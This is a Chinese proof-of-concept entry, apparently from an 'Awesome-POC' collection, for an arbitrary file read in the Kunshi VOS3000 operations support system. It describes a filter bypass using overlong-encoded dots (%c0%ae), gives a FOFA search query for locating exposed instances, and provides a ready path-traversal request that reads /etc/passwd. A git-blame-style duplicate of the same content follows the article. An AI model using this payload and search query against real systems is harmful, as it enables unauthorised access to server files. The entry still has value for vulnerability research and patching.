Awesome-POC/Web应用漏洞/昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞.md

# 昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞

## 漏洞描述

昆石网络 VOS3000虚拟运营支撑系统 通过 %c0%ae%c0%ae 等字符绕过检测，可导致任意文件读取漏洞

## 漏洞影响

```
昆石网络 VOS3000虚拟运营支撑系统
```

## 网络测绘

```
app="VOS-VOS3000"
```

## 漏洞复现

登录页面

![image-20220525144202606](./images/202205251442673.png)

验证POC

```
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
```

![](./images/202205251443278.png)
更新漏洞库：Web应用漏洞/ 2022-05-25 15:32:50 +08:00			`# 昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞`

			`## 漏洞描述`

			`昆石网络 VOS3000虚拟运营支撑系统通过 %c0%ae%c0%ae 等字符绕过检测，可导致任意文件读取漏洞`

			`## 漏洞影响`

			```
			`昆石网络 VOS3000虚拟运营支撑系统`
			```

更新漏洞 2023-08-28 15:55:36 +08:00			`## 网络测绘`
更新漏洞库：Web应用漏洞/ 2022-05-25 15:32:50 +08:00
			```
			`app="VOS-VOS3000"`
			```

			`## 漏洞复现`

			`登录页面`

更新漏洞 2022-12-05 11:09:28 +08:00			`![image-20220525144202606](./images/202205251442673.png)`
更新漏洞库：Web应用漏洞/ 2022-05-25 15:32:50 +08:00
			`验证POC`

			```
			`/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd`
			```

更新漏洞 2022-12-05 11:09:28 +08:00			`![](./images/202205251443278.png)`